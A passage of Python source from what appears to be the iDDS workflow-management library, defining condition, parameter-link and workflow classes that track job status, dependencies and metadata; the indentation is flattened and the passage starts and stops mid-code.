if true_work is not None and not isinstance(true_work, Work):
raise exceptions.IDDSException("true_work can only be set with Work class")
if false_work is not None and not isinstance(false_work, Work):
raise exceptions.IDDSException("false_work can only be set with Work class")
super(TemplateCondition, self).__init__(operator=ConditionOperator.And,
conditions=[cond] if cond else [],
true_works=[true_work] if true_work else [],
false_works=[false_work] if false_work else [],
logger=logger)
def validate_conditions(self, conditions):
if type(conditions) not in [tuple, list]:
raise exceptions.IDDSException("conditions must be list")
if len(conditions) > 1:
raise exceptions.IDDSException("Condition class can only support one condition. To support multiple condition, please use CompositeCondition.")
for cond in conditions:
assert(inspect.ismethod(cond))
assert(isinstance(cond.__self__, Work))
def add_condition(self, cond):
raise exceptions.IDDSException("Condition class doesn't support add_condition. To support multiple condition, please use CompositeCondition.")
class ParameterLink(Base):
def __init__(self, parameters):
super(ParameterLink, self).__init__()
self.parameters = {}
self.num_parameters = 0
if parameters:
if type(parameters) not in [list, tuple]:
parameters = [parameters]
for p in parameters:
if p:
if type(p) in [str]:
self.parameters[str(self.num_parameters)] = {'source': p, 'destination': p}
self.num_parameters += 1
elif type(p) in [dict] and 'source' in p and 'destination' in p:
self.parameters[str(self.num_parameters)] = {'source': p['source'], 'destination': p['destination']}
self.num_parameters += 1
else:
raise Exception("Cannot parse the parameters format. Accepted format: list of string or dict{'source': <>, 'destination': <>}")
self.internal_id = str(uuid.uuid4())[:8]
self.template_id = self.internal_id
def get_internal_id(self):
return self.internal_id
def get_parameter_value(self, work, p):
ret = None
p_f = getattr(work, p, 'None')
if p_f:
if callable(p_f):
ret = p_f()
else:
ret = p_f
else:
ret = None
if ret and type(ret) in [Collection] and hasattr(ret, 'to_origin_dict'):
ret = ret.to_origin_dict()
return ret
def set_parameters(self, work):
p_values = {}
for p in self.parameters:
p_values[p] = self.get_parameter_value(work, self.parameters[p]['source'])
self.add_metadata_item('parameters', p_values)
def get_parameters(self):
p_values = self.get_metadata_item('parameters', {})
ret = {}
for p in self.parameters:
if p in p_values:
ret[self.parameters[p]['destination']] = p_values[p]
return ret
class WorkflowBase(Base):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
"""
Init a workflow.
"""
self._works = {}
self._conditions = {}
self._work_conds = {}
self.parameter_links = {}
self.parameter_links_source = {}
self.parameter_links_destination = {}
self._global_parameters = {}
super(WorkflowBase, self).__init__()
self.internal_id = str(uuid.uuid4())[:8]
self.template_work_id = self.internal_id
# self.template_work_id = str(uuid.uuid4())[:8]
self.lifetime = lifetime
self.pending_time = pending_time
if name:
self._name = name + "." + datetime.datetime.utcnow().strftime("%Y_%m_%d_%H_%M_%S_%f") + str(random.randint(1, 1000))
else:
self._name = 'idds.workflow.' + datetime.datetime.utcnow().strftime("%Y_%m_%d_%H_%M_%S_%f") + str(random.randint(1, 1000))
if workload_id is None:
workload_id = int(time.time())
self.workload_id = workload_id
self.logger = logger
if self.logger is None:
self.setup_logger()
self._works = {}
self.works = {}
self.work_sequence = {} # order list
self.terminated_works = []
self.initial_works = []
# if the primary initial_work is not set, it's the first initial work.
self.primary_initial_work = None
self.independent_works = []
self.first_initial = False
self.new_to_run_works = []
self.current_running_works = []
self.num_subfinished_works = 0
self.num_finished_works = 0
self.num_failed_works = 0
self.num_cancelled_works = 0
self.num_suspended_works = 0
self.num_expired_works = 0
self.num_total_works = 0
self.last_work = None
self.last_updated_at = datetime.datetime.utcnow()
self.expired = False
self.to_update_transforms = {}
# user defined Condition class
self.user_defined_conditions = {}
self.username = None
self.userdn = None
self.proxy = None
self._loop_condition_position = 'end'
self.loop_condition = None
self.num_run = None
self.global_parameters = {}
"""
self._running_data_names = []
for name in ['internal_id', 'template_work_id', 'workload_id', 'work_sequence', 'terminated_works',
'first_initial', 'new_to_run_works', 'current_running_works',
'num_subfinished_works', 'num_finished_works', 'num_failed_works', 'num_cancelled_works', 'num_suspended_works',
'num_expired_works', 'num_total_works', 'last_work']:
self._running_data_names.append(name)
for name in ['works']:
self._running_data_names.append(name)
"""
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def get_template_work_id(self):
return self.template_work_id
def get_template_id(self):
return self.template_work_id
@property
def workload_id(self):
return self.get_metadata_item('workload_id')
@workload_id.setter
def workload_id(self, value):
self.add_metadata_item('workload_id', value)
@property
def lifetime(self):
# return self.get_metadata_item('lifetime', None)
return getattr(self, '_lifetime', None)
@lifetime.setter
def lifetime(self, value):
# self.add_metadata_item('lifetime', value)
self._lifetime = value
@property
def pending_time(self):
# return self.get_metadata_item('pending_time', None)
return getattr(self, '_pending_time', None)
@pending_time.setter
def pending_time(self, value):
# self.add_metadata_item('pending_time', value)
self._pending_time = value
@property
def last_updated_at(self):
last_updated_at = self.get_metadata_item('last_updated_at', None)
if last_updated_at and type(last_updated_at) in [str]:
last_updated_at = str_to_date(last_updated_at)
return last_updated_at
@last_updated_at.setter
def last_updated_at(self, value):
self.add_metadata_item('last_updated_at', value)
def has_new_updates(self):
self.last_updated_at = datetime.datetime.utcnow()
@property
def expired(self):
t = self.get_metadata_item('expired', False)
if type(t) in [bool]:
return t
elif type(t) in [str] and t.lower() in ['true']:
return True
else:
return False
@expired.setter
def expired(self, value):
self.add_metadata_item('expired', value)
@property
def works(self):
return self._works
@works.setter
def works(self, value):
self._works = value
work_metadata = {}
if self._works:
for k in self._works:
work = self._works[k]
if isinstance(work, Workflow):
work_metadata[k] = {'type': 'workflow',
'metadata': work.metadata}
else:
work_metadata[k] = {'type': 'work',
'work_id': work.work_id,
'workload_id': work.workload_id,
'external_id': work.external_id,
'status': work.status.value if work.status else work.status,
'substatus': work.substatus.value if work.substatus else work.substatus,
'next_works': work.next_works,
'transforming': work.transforming}
self.add_metadata_item('works', work_metadata)
def refresh_works(self):
work_metadata = {}
if self._works:
for k in self._works:
work = self._works[k]
if isinstance(work, Workflow):
work.refresh_works()
work_metadata[k] = {'type': 'workflow',
'metadata': work.metadata}
else:
work_metadata[k] = {'type': 'work',
'work_id': work.work_id,
'workload_id': work.workload_id,
'external_id': work.external_id,
'status': work.status.value if work.status else work.status,
'substatus': work.substatus.value if work.substatus else work.substatus,
'next_works': work.next_works,
'transforming': work.transforming}
if work.last_updated_at and (not self.last_updated_at or work.last_updated_at > self.last_updated_at):
self.last_updated_at = work.last_updated_at
self.add_metadata_item('works', work_metadata)
def load_works(self):
work_metadata = self.get_metadata_item('works', {})
for k in self._works:
if k in work_metadata:
if work_metadata[k]['type'] == 'work':
self._works[k].work_id = work_metadata[k]['work_id']
self._works[k].workload_id = work_metadata[k]['workload_id'] if 'workload_id' in work_metadata[k] else None
self._works[k].external_id = work_metadata[k]['external_id'] if 'external_id' in work_metadata[k] else None
self._works[k].transforming = work_metadata[k]['transforming']
self._works[k].status = WorkStatus(work_metadata[k]['status']) if work_metadata[k]['status'] else work_metadata[k]['status']
self._works[k].substatus = WorkStatus(work_metadata[k]['substatus']) if work_metadata[k]['substatus'] else work_metadata[k]['substatus']
self._works[k].next_works = work_metadata[k]['next_works'] if 'next_works' in work_metadata[k] else []
elif work_metadata[k]['type'] == 'workflow':
self._works[k].metadata = work_metadata[k]['metadata']
work = self._works[k]
if work.last_updated_at and (not self.last_updated_at or work.last_updated_at > self.last_updated_at):
self.last_updated_at = work.last_updated_at
@property
def conditions(self):
return self._conditions
@conditions.setter
def conditions(self, value):
self._conditions = value
conditions_metadata = {}
if self._conditions:
for k in self._conditions:
conditions_metadata[k] = self._conditions[k].metadata
self.add_metadata_item('conditions', conditions_metadata)
@property
def work_conds(self):
return self._work_conds
@work_conds.setter
def work_conds(self, value):
self._work_conds = value
# self.add_metadata_item('work_conds', value)
def load_work_conditions(self):
conditions_metadata = self.get_metadata_item('conditions', {})
for cond_internal_id in self._conditions:
if cond_internal_id in conditions_metadata:
self.conditions[cond_internal_id].metadata = conditions_metadata[cond_internal_id]
self.conditions[cond_internal_id].load_conditions(self.works)
# work_conds = self.get_metadata_item('work_conds', {})
# self._work_conds = work_conds
@property
def global_parameters(self):
self._global_parameters = self.get_metadata_item('gp', {})
return self._global_parameters
@global_parameters.setter
def global_parameters(self, value):
self._global_parameters = value
gp_metadata = {}
if self._global_parameters:
for key in self._global_parameters:
if key.startswith("user_"):
gp_metadata[key] = self._global_parameters[key]
else:
self.logger.warn("Only parameters start with 'user_' can be set as global parameters. The parameter '%s' will be ignored." % (key))
self.add_metadata_item('gp', gp_metadata)
def set_global_parameters(self, value):
self.global_parameters = value
def sync_global_parameters_from_work(self, work):
self.log_debug("work %s is_terminated, global_parameters: %s" % (work.get_internal_id(), str(self.global_parameters)))
if self.global_parameters:
for key in self.global_parameters:
status, value = work.get_global_parameter_from_output_data(key)
self.log_debug("work %s get_global_parameter_from_output_data(key: %s) results(%s:%s)" % (work.get_internal_id(), key, status, value))
if status:
self.global_parameters[key] = value
elif hasattr(work, key):
self.global_parameters[key] = getattr(work, key)
self.set_global_parameters(self.global_parameters)
@property
def loop_condition(self):
return self._loop_condition
@loop_condition.setter
def loop_condition(self, value):
# self._loop_condition_position = position
self._loop_condition = value
if self._loop_condition:
self.add_metadata_item('loop_condition', self._loop_condition.get_condition_status())
@property
def work_sequence(self):
return self.get_metadata_item('work_sequence', {})
@work_sequence.setter
def work_sequence(self, value):
self.add_metadata_item('work_sequence', value)
@property
def terminated_works(self):
return self.get_metadata_item('terminated_works', [])
@terminated_works.setter
def terminated_works(self, value):
self.add_metadata_item('terminated_works', value)
@property
def first_initial(self):
return self.get_metadata_item('first_initial', False)
@first_initial.setter
def first_initial(self, value):
self.add_metadata_item('first_initial', value)
@property
def new_to_run_works(self):
return self.get_metadata_item('new_to_run_works', [])
@new_to_run_works.setter
def new_to_run_works(self, value):
self.add_metadata_item('new_to_run_works', value)
@property
def current_running_works(self):
return self.get_metadata_item('current_running_works', [])
@current_running_works.setter
def current_running_works(self, value):
self.add_metadata_item('current_running_works', value)
@property
def num_subfinished_works(self):
return self.get_metadata_item('num_subfinished_works', 0)
@num_subfinished_works.setter
def num_subfinished_works(self, value):
self.add_metadata_item('num_subfinished_works', value)
@property
def num_finished_works(self):
return self.get_metadata_item('num_finished_works', 0)
@num_finished_works.setter
def num_finished_works(self, value):
self.add_metadata_item('num_finished_works', value)
@property
def num_failed_works(self):
return self.get_metadata_item('num_failed_works', 0)
@num_failed_works.setter
def num_failed_works(self, value):
self.add_metadata_item('num_failed_works', value)
@property
def num_cancelled_works(self):
return self.get_metadata_item('num_cancelled_works', 0)
@num_cancelled_works.setter
def num_cancelled_works(self, value):
self.add_metadata_item('num_cancelled_works', value)
@property
def num_suspended_works(self):
return self.get_metadata_item('num_suspended_works', 0)
@num_suspended_works.setter
def num_suspended_works(self, value):
self.add_metadata_item('num_suspended_works', value)
@property
def num_expired_works(self):
return self.get_metadata_item('num_expired_works', 0)
@num_expired_works.setter
def num_expired_works(self, value):
self.add_metadata_item('num_expired_works', value)
@property
def num_total_works(self):
return self.get_metadata_item('num_total_works', 0)
@num_total_works.setter
def num_total_works(self, value):
self.add_metadata_item('num_total_works', value)
@property
def last_work(self):
return self.get_metadata_item('last_work', None)
@last_work.setter
def last_work(self, value):
self.add_metadata_item('last_work', value)
@property
def init_works(self):
return self.get_metadata_item('init_works', [])
@init_works.setter
def init_works(self, value):
self.add_metadata_item('init_works', value)
@property
def to_update_transforms(self):
return self.get_metadata_item('to_update_transforms', {})
@to_update_transforms.setter
def to_update_transforms(self, value):
self.add_metadata_item('to_update_transforms', value)
@property
def num_run(self):
return self.get_metadata_item('num_run', None)
@num_run.setter
def num_run(self, value):
if value is not None:
self.add_metadata_item('num_run', value)
def load_metadata(self):
self.load_works()
self.load_work_conditions()
self.load_parameter_links()
def get_class_name(self):
return self.__class__.__name__
def setup_logger(self):
"""
Setup logger
"""
self.logger = logging.getLogger(self.get_class_name())
def log_info(self, info):
if self.logger is None:
self.setup_logger()
self.logger.info(info)
def log_debug(self, info):
if self.logger is None:
self.setup_logger()
self.logger.debug(info)
def get_internal_id(self):
return self.internal_id
def copy(self):
new_wf = copy.deepcopy(self)
return new_wf
def __deepcopy__(self, memo):
logger = self.logger
self.logger = None
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Deep copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
self.logger = logger
result.logger = logger
return result
def get_works(self):
return self.works
def get_new_work_to_run(self, work_id, new_parameters=None):
# 1. initialize works
# template_id = work.get_template_id()
work = self.works[work_id]
if isinstance(work, Workflow):
work.sync_works()
work.sequence_id = self.num_total_works
work.parent_num_run = self.num_run
works = self.works
self.works = works
# self.work_sequence.append(new_work.get_internal_id())
self.work_sequence[str(self.num_total_works)] = work.get_internal_id()
self.num_total_works += 1
self.new_to_run_works.append(work.get_internal_id())
self.last_work = work.get_internal_id()
else:
new_parameters = self.get_destination_parameters(work_id)
if new_parameters:
work.set_parameters(new_parameters)
work.sequence_id = self.num_total_works
work.initialize_work()
work.sync_global_parameters(self.global_parameters)
work.renew_parameters_from_attributes()
work.num_run = self.num_run
works = self.works
self.works = works
# self.work_sequence.append(new_work.get_internal_id())
self.work_sequence[str(self.num_total_works)] = work.get_internal_id()
self.num_total_works += 1
self.new_to_run_works.append(work.get_internal_id())
self.last_work = work.get_internal_id()
return work
def get_new_parameters_for_work(self, work):
new_parameters = self.get_destination_parameters(work.get_internal_id())
if new_parameters:
work.set_parameters(new_parameters)
work.sequence_id = self.num_total_works
work.initialize_work()
work.sync_global_parameters(self.global_parameters)
work.renew_parameters_from_attributes()
works = self.works
self.works = works
return work
def register_user_defined_condition(self, condition):
cond_src = inspect.getsource(condition)
self.user_defined_conditions[condition.__name__] = cond_src
def load_user_defined_condition(self):
# try:
# Condition()
# except NameError:
# global Condition
# import Condition
for cond_src_name in self.user_defined_conditions:
# global cond_src_name
exec(self.user_defined_conditions[cond_src_name])
def set_workload_id(self, workload_id):
self.workload_id = workload_id
def get_workload_id(self):
return self.workload_id
def add_initial_works(self, work):
self.initial_works.append(work.get_internal_id())
if self.primary_initial_work is None:
self.primary_initial_work = work.get_internal_id()
def add_work(self, work, initial=False, primary=False):
self.first_initial = False
self.works[work.get_internal_id()] = work
if initial:
if primary:
self.primary_initial_work = work.get_internal_id()
self.add_initial_works(work)
self.independent_works.append(work.get_internal_id())
def add_condition(self, cond):
self.first_initial = False
cond_works = cond.all_works()
for cond_work in cond_works:
assert(cond_work.get_internal_id() in self.get_works())
conditions = self.conditions
conditions[cond.get_internal_id()] = cond
self.conditions = conditions
# if cond.current_work not in self.work_conds:
# self.work_conds[cond.current_work] = []
# self.work_conds[cond.current_work].append(cond)
work_conds = self.work_conds
for work in cond.all_pre_works():
if work.get_internal_id() not in work_conds:
work_conds[work.get_internal_id()] = []
work_conds[work.get_internal_id()].append(cond.get_internal_id())
self.work_conds = work_conds
# if a work is a true_work or false_work of a condition,
# should remove it from independent_works
cond_next_works = cond.all_next_works()
for next_work in cond_next_works:
if next_work.get_internal_id() in self.independent_works:
self.independent_works.remove(next_work.get_internal_id())
def find_workflow_from_work(self, work):
if work.get_internal_id() in self._works:
return self
else:
for k in self._works:
wk = self._works[k]
if isinstance(wk, Workflow):
wf = wk.find_workflow_from_work(work)
if wf:
return wf
return None
def add_parameter_link(self, work_source, work_destinations, parameter_link):
wf_s = self.find_workflow_from_work(work_source)
if not wf_s:
raise Exception("Cannot find work %s in the workflow." % work_source.get_internal_id())
if work_source.get_internal_id() not in wf_s.parameter_links_source:
wf_s.parameter_links_source[work_source.get_internal_id()] = []
wf_s.parameter_links_source[work_source.get_internal_id()].append(parameter_link.get_internal_id())
if type(work_destinations) not in [list, tuple]:
work_destinations = [work_destinations]
for work_destination in work_destinations:
wf = self.find_workflow_from_work(work_destination)
if not wf:
raise Exception("Cannot find work %s in the workflow." % work_destination.get_internal_id())
if parameter_link.get_internal_id() not in wf.parameter_links:
wf.parameter_links[parameter_link.get_internal_id()] = parameter_link
if work_destination.get_internal_id() not in wf.parameter_links_destination:
wf.parameter_links_destination[work_destination.get_internal_id()] = []
wf.parameter_links_destination[work_destination.get_internal_id()].append(parameter_link.get_internal_id())
def find_parameter_links_from_id(self, internal_id):
rets = []
if internal_id in self.parameter_links:
rets.append((self, self.parameter_links[internal_id]))
for k in self._works:
wk = self._works[k]
if isinstance(wk, Workflow):
links = wk.find_parameter_links_from_id(internal_id)
rets = rets + links
return rets
def refresh_parameter_links(self):
p_metadata = {}
for internal_id in self.parameter_links:
p_metadata[internal_id] = self.parameter_links[internal_id].metadata
self.add_metadata_item('parameter_links', p_metadata)
def get_parameter_links_metadata(self):
p_metadata = {}
for internal_id in self.parameter_links:
p_metadata[internal_id] = self.parameter_links[internal_id].metadata
self.add_metadata_item('parameter_links', p_metadata)
return p_metadata
def set_parameter_links_metadata(self, p_links):
for internal_id in self.parameter_links:
if internal_id in p_links:
p_metadata = p_links[internal_id]
self.parameter_links[internal_id].metadata = p_metadata
def set_source_parameters(self, internal_id):
work = self.works[internal_id]
# if type(work) in [Work]:
# print(work.work_id)
# print(internal_id)
# print(self.parameter_links_source)
if internal_id in self.parameter_links_source:
for p_id in self.parameter_links_source[internal_id]:
# print(p_id)
p_links = self.find_parameter_links_from_id(p_id)
# print(p_links)
for wf, p_link in p_links:
p_link.set_parameters(work)
wf.refresh_parameter_links()
def get_destination_parameters(self, internal_id):
# work = self.works[internal_id]
parameters = {}
if internal_id in self.parameter_links_destination:
for p_id in self.parameter_links_destination[internal_id]:
p_link = self.parameter_links[p_id]
parameters.update(p_link.get_parameters())
return parameters
def load_parameter_links(self):
p_metadata = self.get_metadata_item('parameter_links', {})
for p_id in self.parameter_links:
if p_id in p_metadata:
self.parameter_links[p_id].metadata = p_metadata[p_id]
def enable_next_works(self, work, cond):
self.log_debug("Checking Work %s condition: %s" % (work.get_internal_id(),
json_dumps(cond, sort_keys=True, indent=4)))
# load_conditions should cover it.
# if cond and self.is_class_method(cond.cond):
# # cond_work_id = self.works[cond.cond['idds_method_class_id']]
# cond.cond = getattr(work, cond.cond['idds_method'])
self.log_info("Work %s condition: %s" % (work.get_internal_id(), cond.conditions))
next_works = cond.get_next_works(trigger=ConditionTrigger.ToTrigger)
self.log_info("Work %s condition status %s" % (work.get_internal_id(), cond.get_cond_status()))
self.log_info("Work %s next works %s" % (work.get_internal_id(), str(next_works)))
new_next_works = []
if next_works is not None:
for next_work in next_works:
# parameters = self.get_destination_parameters(next_work.get_internal_id())
new_next_work = self.get_new_work_to_run(next_work.get_internal_id())
work.add_next_work(new_next_work.get_internal_id())
# cond.add_condition_work(new_next_work) ####### TODO:
new_next_works.append(new_next_work)
return new_next_works
def add_loop_condition(self, condition, position='end'):
self.loop_condition_position = position
self.loop_condition = condition
def has_loop_condition(self):
if self.loop_condition:
return True
return False
def get_loop_condition_status(self):
if self.has_loop_condition():
self.loop_condition.load_conditions(self.works)
return self.loop_condition.get_condition_status()
return False
def __str__(self):
return str(json_dumps(self))
def get_new_works(self):
"""
*** Function called by Marshaller agent.
new works to be ready to start
"""
self.sync_works()
works = []
for k in self.new_to_run_works:
if isinstance(self.works[k], Work):
self.works[k] = self.get_new_parameters_for_work(self.works[k])
works.append(self.works[k])
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_new_works()
for k in self.current_running_works:
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_new_works()
return works
def get_current_works(self):
"""
*** Function called by Marshaller agent.
Current running works
"""
self.sync_works()
works = []
for k in self.current_running_works:
if isinstance(self.works[k], Work):
works.append(self.works[k])
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_current_works()
return works
def get_all_works(self):
"""
*** Function called by Marshaller agent.
Current running works
"""
self.sync_works()
works = []
for k in self.works:
if isinstance(self.works[k], Work):
works.append(self.works[k])
if isinstance(self.works[k], Workflow):
works = works + self.works[k].get_all_works()
return works
def get_primary_initial_collection(self):
"""
*** Function called by Clerk agent.
"""
if self.primary_initial_work:
if isinstance(self.get_works()[self.primary_initial_work], Workflow):
return self.get_works()[self.primary_initial_work].get_primary_initial_collection()
else:
return self.get_works()[self.primary_initial_work].get_primary_input_collection()
elif self.initial_works:
if isinstance(self.get_works()[self.initial_works[0]], Workflow):
return self.get_works()[self.initial_works[0]].get_primary_initial_collection()
else:
return self.get_works()[self.initial_works[0]].get_primary_input_collection()
elif self.independent_works:
if isinstance(self.get_works()[self.independent_works[0]], Workflow):
return self.get_works()[self.independent_works[0]].get_primary_initial_collection()
else:
return self.get_works()[self.independent_works[0]].get_primary_input_collection()
else:
keys = self.get_works().keys()
if isinstance(self.get_works()[keys[0]], Workflow):
return self.get_works()[keys[0]].get_primary_initial_collection()
else:
return self.get_works()[keys[0]].get_primary_input_collection()
return None
def get_dependency_works(self, work_id, depth, max_depth):
if depth > max_depth:
return []
deps = []
for dep_work_id in self.work_dependencies[work_id]:
deps.append(dep_work_id)
l_deps = self.get_dependency_works(dep_work_id, depth + 1, max_depth)
deps += l_deps
deps = list(dict.fromkeys(deps))
return deps
def order_independent_works(self):
ind_work_ids = self.independent_works
self.independent_works = []
self.work_dependencies = {}
for ind_work_id in ind_work_ids:
work = self.works[ind_work_id]
self.work_dependencies[ind_work_id] = []
for ind_work_id1 in ind_work_ids:
if ind_work_id == ind_work_id1:
continue
work1 = self.works[ind_work_id1]
if work.depend_on(work1):
self.work_dependencies[ind_work_id].append(ind_work_id1)
self.log_debug('work dependencies 1: %s' % str(self.work_dependencies))
max_depth = len(ind_work_ids) + 1
work_dependencies = copy.deepcopy(self.work_dependencies)
for work_id in work_dependencies:
deps = self.get_dependency_works(work_id, 0, max_depth)
self.work_dependencies[work_id] = deps
self.log_debug('work dependencies 2: %s' % str(self.work_dependencies))
while True:
for work_id in self.work_dependencies:
if work_id not in self.independent_works and len(self.work_dependencies[work_id]) == 0:
self.independent_works.append(work_id)
for work_id in self.independent_works:
if work_id in self.work_dependencies:
del self.work_dependencies[work_id]
for work_id in self.work_dependencies:
for in_work_id in self.independent_works:
if in_work_id in self.work_dependencies[work_id]:
self.work_dependencies[work_id].remove(in_work_id)
if not self.work_dependencies:
break
self.log_debug('independent_works: %s' % str(self.independent_works))
def first_initialize(self):
# set new_to_run works
if not self.first_initial:
self.first_initial = True
self.order_independent_works()
if self.initial_works:
tostart_works = self.initial_works
elif self.independent_works:
tostart_works = self.independent_works
else:
tostart_works = list(self.get_works().keys())
tostart_works = [tostart_works[0]]
init_works = []
for work_id in tostart_works:
self.get_new_work_to_run(work_id)
init_works.append(work_id)
self.init_works = init_works
def sync_works(self):
self.first_initialize()
self.refresh_works()
for k in self.works:
work = self.works[k]
self.log_debug("work %s is_terminated(%s:%s)" % (work.get_internal_id(), work.is_terminated(), work.get_status()))
for work in [self.works[k] for k in self.new_to_run_works]:
if work.transforming:
self.new_to_run_works.remove(work.get_internal_id())
self.current_running_works.append(work.get_internal_id())
for work in [self.works[k] for k in self.current_running_works]:
if isinstance(work, Workflow):
work.sync_works()
if work.is_terminated():
self.log_debug("work %s is_terminated, sync_global_parameters_from_work" % (work.get_internal_id()))
self.set_source_parameters(work.get_internal_id())
self.sync_global_parameters_from_work(work)
if work.get_internal_id() in self.work_conds:
self.log_debug("Work %s has condition dependencies %s" % (work.get_internal_id(),
json_dumps(self.work_conds[work.get_internal_id()], sort_keys=True, indent=4)))
for cond_id in self.work_conds[work.get_internal_id()]:
cond = self.conditions[cond_id]
self.log_debug("Work %s has condition dependencie %s" % (work.get_internal_id(),
json_dumps(cond, sort_keys=True, indent=4)))
self.enable_next_works(work, cond)
if work.is_terminated():
self.log_info("Work %s is terminated(%s)" % (work.get_internal_id(), work.get_status()))
self.log_debug("Work conditions: %s" % json_dumps(self.work_conds, sort_keys=True, indent=4))
if work.get_internal_id() not in self.work_conds:
# has no next work
self.log_info("Work %s has no condition dependencies" % work.get_internal_id())
self.terminated_works.append(work.get_internal_id())
self.current_running_works.remove(work.get_internal_id())
else:
# self.log_debug("Work %s has condition dependencies %s" % (work.get_internal_id(),
# json_dumps(self.work_conds[work.get_template_id()], sort_keys=True, indent=4)))
# for cond in self.work_conds[work.get_template_id()]:
# self.enable_next_works(work, cond)
self.terminated_works.append(work.get_internal_id())
self.current_running_works.remove(work.get_internal_id())
if work.is_finished():
self.num_finished_works += 1
elif work.is_subfinished():
self.num_subfinished_works += 1
elif work.is_failed():
self.num_failed_works += 1
elif work.is_expired():
self.num_expired_works += 1
elif work.is_cancelled():
self.num_cancelled_works += 1
elif work.is_suspended():
self.num_suspended_works += 1
# if work.is_terminated():
# # if it's a loop workflow, to generate new loop
# if isinstance(work, Workflow):
# work.sync_works()
log_str = "num_total_works: %s" % self.num_total_works
log_str += ", num_finished_works: %s" % self.num_finished_works
log_str += ", num_subfinished_works: %s" % self.num_subfinished_works
log_str += ", num_failed_works: %s" % self.num_failed_works
log_str += ", num_expired_works: %s" % self.num_expired_works
log_str += ", num_cancelled_works: %s" % self.num_cancelled_works
log_str += ", num_suspended_works: %s" % self.num_suspended_works
self.log_debug(log_str)
self.refresh_works()
def resume_works(self):
self.num_subfinished_works = 0
self.num_finished_works = 0
self.num_failed_works = 0
self.num_cancelled_works = 0
self.num_suspended_works = 0
self.num_expired_works = 0
self.last_updated_at = datetime.datetime.utcnow()
t_works = self.terminated_works
self.terminated_works = []
self.current_running_works = self.current_running_works + t_works
for work in [self.works[k] for k in self.current_running_works]:
if isinstance(work, Workflow):
work.resume_works()
else:
work.resume_work()
def get_relation_data(self, work):
ret = {'work': {'workload_id': work.workload_id,
'external_id': work.external_id}}
next_works = work.next_works
if next_works:
next_works_data = []
for next_id in next_works:
next_work = self.works[next_id]
if isinstance(next_work, Workflow):
next_work_data = next_work.get_relation_map()
else:
next_work_data = self.get_relation_data(next_work)
next_works_data.append(next_work_data)
ret['next_works'] = next_works_data
return ret
def get_relation_map(self):
ret = []
init_works = self.init_works
for internal_id in init_works:
work_data = self.get_relation_data(self.works[internal_id])
ret.append(work_data)
return ret
def clean_works(self):
self.num_subfinished_works = 0
self.num_finished_works = 0
self.num_failed_works = 0
self.num_cancelled_works = 0
self.num_suspended_works = 0
self.num_expired_works = 0
self.num_total_works = 0
self.last_updated_at = datetime.datetime.utcnow()
self.terminated_works = []
self.current_running_works = []
self.works = {}
self.work_sequence = {} # order list
self.first_initial = False
self.new_to_run_works = []
def get_exact_workflows(self):
"""
*** Function called by Clerk agent.
TODO: The primary dataset for the initial work is a dataset with '*'.
workflow.primary_initial_collection = 'some datasets with *'
collections = get_collection(workflow.primary_initial_collection)
wfs = []
for coll in collections:
wf = self.copy()
wf.name = self.name + "_" + number
wf.primary_initial_collection = coll
wfs.append(wf)
return wfs
"""
return [self]
def is_terminated(self):
"""
*** Function called by Marshaller agent.
"""
self.sync_works()
if len(self.new_to_run_works) == 0 and len(self.current_running_works) == 0:
return True
return False
def is_finished(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and self.num_finished_works == self.num_total_works
def is_subfinished(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_finished_works + self.num_subfinished_works > 0 and self.num_finished_works + self.num_subfinished_works <= self.num_total_works)
def is_failed(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_failed_works > 0) and (self.num_cancelled_works == 0) and (self.num_suspended_works == 0) and (self.num_expired_works == 0)
def is_to_expire(self, expired_at=None, pending_time=None, request_id=None):
if self.expired:
# it's already expired. avoid sending duplicated messages again and again.
return False
if expired_at:
if type(expired_at) in [str]:
expired_at = str_to_date(expired_at)
if expired_at < datetime.datetime.utcnow():
self.logger.info("Request(%s) expired_at(%s) is smaller than utc now(%s), expiring" % (request_id,
expired_at,
datetime.datetime.utcnow()))
return True
act_pending_time = None
if self.pending_time:
# in days
act_pending_time = float(self.pending_time)
else:
if pending_time:
act_pending_time = float(pending_time)
if act_pending_time:
act_pending_seconds = int(86400 * act_pending_time)
if self.last_updated_at + datetime.timedelta(seconds=act_pending_seconds) < datetime.datetime.utcnow():
log_str = "Request(%s) last updated at(%s) + pending seconds(%s)" % (request_id,
self.last_updated_at,
act_pending_seconds)
log_str += " is smaller than utc now(%s), expiring" % (datetime.datetime.utcnow())
self.logger.info(log_str)
return True
return False
def is_expired(self):
"""
*** Function called by Marshaller agent.
"""
# return self.is_terminated() and (self.num_expired_works > 0)
return self.is_terminated() and self.expired
def is_cancelled(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_cancelled_works > 0)
def is_suspended(self):
"""
*** Function called by Marshaller agent.
"""
return self.is_terminated() and (self.num_suspended_works > 0)
def get_terminated_msg(self):
"""
*** Function called by Marshaller agent.
"""
if self.last_work:
return self.works[self.last_work].get_terminated_msg()
return None
def get_status(self):
if self.is_terminated():
if self.is_finished():
return WorkStatus.Finished
elif self.is_subfinished():
return WorkStatus.SubFinished
elif self.is_failed():
return WorkStatus.Failed
elif self.is_expired():
return WorkStatus.Expired
elif self.is_cancelled():
return WorkStatus.Cancelled
elif self.is_suspended():
return WorkStatus.Suspended
return WorkStatus.Transforming
def depend_on(self, work):
return False
def add_proxy(self):
self.proxy = get_proxy()
if not self.proxy:
raise Exception("Cannot get local proxy")
def get_proxy(self):
return self.proxy
class Workflow(Base):
def __init__(self, name=None, workload_id=None, lifetime=None, pending_time=None, logger=None):
# super(Workflow, self).__init__(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
self.logger = logger
if self.logger is None:
self.setup_logger()
self.template = WorkflowBase(name=name, workload_id=workload_id, lifetime=lifetime, pending_time=pending_time, logger=logger)
self.parent_num_run = None
self._num_run = 0
self.runs = {}
self.loop_condition_position = 'end'
def setup_logger(self):
# Setup logger
self.logger = logging.getLogger(self.get_class_name())
def __deepcopy__(self, memo):
logger = self.logger
